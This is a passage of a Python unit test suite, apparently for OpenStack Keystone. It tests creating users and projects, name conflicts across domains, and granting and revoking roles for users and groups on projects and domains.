self.identity_api.update_user,
user1['id'],
user1)
def test_rename_duplicate_user_name_fails(self):
user1 = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
user2 = {'id': 'fake2',
'name': 'fake2',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_api.create_user('fake1', user1)
self.identity_api.create_user('fake2', user2)
user2['name'] = 'fake1'
self.assertRaises(exception.Conflict,
self.identity_api.update_user,
'fake2',
user2)
def test_update_user_id_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_api.create_user('fake1', user)
user['id'] = 'fake2'
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['id'], 'fake1')
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
'fake2')
def test_create_duplicate_project_id_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_project, {},
'fake1',
tenant)
def test_create_duplicate_project_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_project, {},
'fake1',
tenant)
def test_create_duplicate_project_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
tenant1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
tenant2 = {'id': uuid.uuid4().hex, 'name': tenant1['name'],
'domain_id': new_domain['id']}
self.identity_man.create_project({}, tenant1['id'], tenant1)
self.identity_man.create_project({}, tenant2['id'], tenant2)
def test_move_project_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
project = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project['id'], project)
project['domain_id'] = domain2['id']
self.identity_api.update_project(project['id'], project)
def test_move_project_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a project in domain1
project1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
# Now create a project in domain2 with a potentially clashing
# name - which should work since we have domain separation
project2 = {'id': uuid.uuid4().hex,
'name': project1['name'],
'domain_id': domain2['id']}
self.identity_man.create_project({}, project2['id'], project2)
# Now try and move project1 into the 2nd domain - which should
# fail since the names clash
project1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
self.identity_api.update_project,
project1['id'],
project1)
def test_rename_duplicate_project_name_fails(self):
tenant1 = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
tenant2 = {'id': 'fake2', 'name': 'fake2',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant1)
self.identity_man.create_project({}, 'fake2', tenant2)
tenant2['name'] = 'fake1'
self.assertRaises(exception.Error,
self.identity_api.update_project,
'fake2',
tenant2)
def test_update_project_id_does_nothing(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project('fake1', tenant)
tenant['id'] = 'fake2'
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['id'], 'fake1')
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
'fake2')
def test_add_duplicate_role_grant(self):
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(self.role_admin['id'], roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], self.role_admin['id'])
self.assertRaises(exception.Conflict,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
self.role_admin['id'])
def test_get_role_by_user_and_project(self):
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(self.role_admin['id'], roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], self.role_admin['id'])
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertIn(self.role_admin['id'], roles_ref)
self.assertNotIn('member', roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertIn(self.role_admin['id'], roles_ref)
self.assertIn('member', roles_ref)
def test_get_roles_for_user_and_domain(self):
""" Test for getting roles for user on a domain.
Test Plan:
- Create a domain, with 2 users
- Check no roles yet exit
- Give user1 two roles on the domain, user2 one role
- Get roles on user1 and the domain - maybe sure we only
get back the 2 roles on user1
- Delete both roles from user1
- Check we get no roles back for user1 on domain
"""
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user1['id'], new_user1)
new_user2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user2['id'], new_user2)
roles_ref = self.identity_api.list_grants(
user_id=new_user1['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
# Now create the grants (roles are defined in default_fixtures)
self.identity_api.create_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.create_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='other')
self.identity_api.create_grant(user_id=new_user2['id'],
domain_id=new_domain['id'],
role_id='admin')
# Read back the roles for user1 on domain
roles_ids = self.identity_api.get_roles_for_user_and_domain(
new_user1['id'], new_domain['id'])
self.assertEqual(len(roles_ids), 2)
self.assertIn(self.role_member['id'], roles_ids)
self.assertIn(self.role_other['id'], roles_ids)
# Now delete both grants for user1
self.identity_api.delete_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.delete_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='other')
roles_ref = self.identity_api.list_grants(
user_id=new_user1['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
def test_get_roles_for_user_and_domain_404(self):
""" Test errors raised when getting roles for user on a domain.
Test Plan:
- Check non-existing user gives UserNotFound
- Check non-existing domain gives DomainNotFound
"""
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user1['id'], new_user1)
self.assertRaises(exception.UserNotFound,
self.identity_api.get_roles_for_user_and_domain,
uuid.uuid4().hex,
new_domain['id'])
self.assertRaises(exception.DomainNotFound,
self.identity_api.get_roles_for_user_and_domain,
new_user1['id'],
uuid.uuid4().hex)
def test_get_roles_for_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_roles_for_user_and_project,
uuid.uuid4().hex,
self.tenant_bar['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_roles_for_user_and_project,
self.user_foo['id'],
uuid.uuid4().hex)
def test_add_role_to_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.add_role_to_user_and_project,
uuid.uuid4().hex,
self.tenant_bar['id'],
self.role_admin['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
uuid.uuid4().hex,
self.role_admin['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
uuid.uuid4().hex)
def test_remove_role_from_user_and_project(self):
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
self.identity_api.remove_role_from_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn('member', roles_ref)
self.assertRaises(exception.NotFound,
self.identity_api.remove_role_from_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
'member')
def test_get_role_grant_by_user_and_project(self):
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id=self.role_admin['id'])
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
self.assertIn(self.role_admin['id'],
[role_ref['id'] for role_ref in roles_ref])
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
roles_ref_ids = []
for i, ref in enumerate(roles_ref):
roles_ref_ids.append(ref['id'])
self.assertIn(self.role_admin['id'], roles_ref_ids)
self.assertIn('member', roles_ref_ids)
def test_get_role_grants_for_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=uuid.uuid4().hex,
project_id=self.tenant_bar['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.list_grants,
user_id=self.user_foo['id'],
project_id=uuid.uuid4().hex)
def test_add_role_grant_to_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.create_grant,
user_id=uuid.uuid4().hex,
project_id=self.tenant_bar['id'],
role_id=self.role_admin['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.create_grant,
user_id=self.user_foo['id'],
project_id=uuid.uuid4().hex,
role_id=self.role_admin['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.create_grant,
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id=uuid.uuid4().hex)
def test_remove_role_grant_from_user_and_project(self):
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_project(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': 'secret', 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_domain(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_correct_role_grant_from_a_mix(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_project = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': new_domain['id']}
self.identity_man.create_project({}, new_project['id'], new_project)
new_group = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_group2 = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group2['id'], new_group2)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
new_user2 = {'id': uuid.uuid4().hex, 'name': 'new_user2',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user2['id'], new_user2)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
# First check we have no grants
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
# Now add the grant we are going to test for, and some others as
# well just to make sure we get back the right one
self.identity_api.create_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.create_grant(group_id=new_group2['id'],
domain_id=new_domain['id'],
role_id=self.role_admin['id'])
self.identity_api.create_grant(user_id=new_user2['id'],
domain_id=new_domain['id'],
role_id=self.role_admin['id'])
self.identity_api.create_grant(group_id=new_group['id'],
project_id=new_project['id'],
role_id=self.role_admin['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_role_grant_by_user_and_domain(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': 'secret', 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_cross_domain(self):
group1_domain1_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(group1_domain1_role['id'],
group1_domain1_role)
group1_domain2_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(group1_domain2_role['id'],
group1_domain2_role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group1 = {'id': uuid.uuid4().hex, 'domain_id': domain1['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group1['id'], group1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 0)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=group1_domain1_role['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertDictEqual(roles_ref[0], group1_domain1_role)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertDictEqual(roles_ref[0], group1_domain2_role)
self.identity_api.delete_grant(group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
def test_get_and_remove_role_grant_by_user_and_cross_domain(self):
user1_domain1_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(user1_domain1_role['id'],
user1_domain1_role)
user1_domain2_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(user1_domain2_role['id'],
user1_domain2_role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 0)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=user1_domain1_role['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertDictEqual(roles_ref[0], user1_domain1_role)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertDictEqual(roles_ref[0], user1_domain2_role)
self.identity_api.delete_grant(user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
def test_role_grant_by_group_and_cross_domain_project(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
role2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role2['id'], role2)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain2['id']}
self.identity_man.create_project({}, project1['id'], project1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role2['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
roles_ref_ids = []
for i, ref in enumerate(roles_ref):
roles_ref_ids.append(ref['id'])
self.assertIn(role1['id'], roles_ref_ids)
self.assertIn(role2['id'], roles_ref_ids)
self.identity_api.delete_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
self.assertDictEqual(roles_ref[0], role2)
def test_role_grant_by_user_and_cross_domain_project(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
role2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role2['id'], role2)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain2['id']}
self.identity_man.create_project({}, project1['id'], project1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role2['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
roles_ref_ids = []
for i, ref in enumerate(roles_ref):
roles_ref_ids.append(ref['id'])
self.assertIn(role1['id'], roles_ref_ids)
self.assertIn(role2['id'], roles_ref_ids)
self.identity_api.delete_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
self.assertDictEqual(roles_ref[0], role2)
def test_multi_role_grant_by_user_group_on_project_domain(self):
role_list = []
for _ in range(8):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
role_list.append(role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
self.identity_api.add_user_to_group(user1['id'],
group1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role_list[0]['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role_list[1]['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role_list[2]['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role_list[3]['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role_list[4]['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role_list[5]['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role_list[6]['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role_list[7]['id'])
roles_ref = self.identity_api.list_grants(user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[0], roles_ref)
self.assertIn(role_list[1], roles_ref)
roles_ref = self.identity_api.list_grants(group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[2], roles_ref)
self.assertIn(role_list[3], roles_ref)
roles_ref = self.identity_api.list_grants(user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[4], roles_ref)
self.assertIn(role_list[5], roles_ref)
roles_ref = self.identity_api.list_grants(group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[6], roles_ref)
self.assertIn(role_list[7], roles_ref)
def test_delete_role_with_user_and_group_grants(self):
raise nose.exc.SkipTest('Blocked by bug 1097472')
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.delete_role(role1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
project_id=project1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
project_id=project1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
domain_id=domain1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
domain_id=domain1['id'])
def test_delete_user_with_group_project_domain_links(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
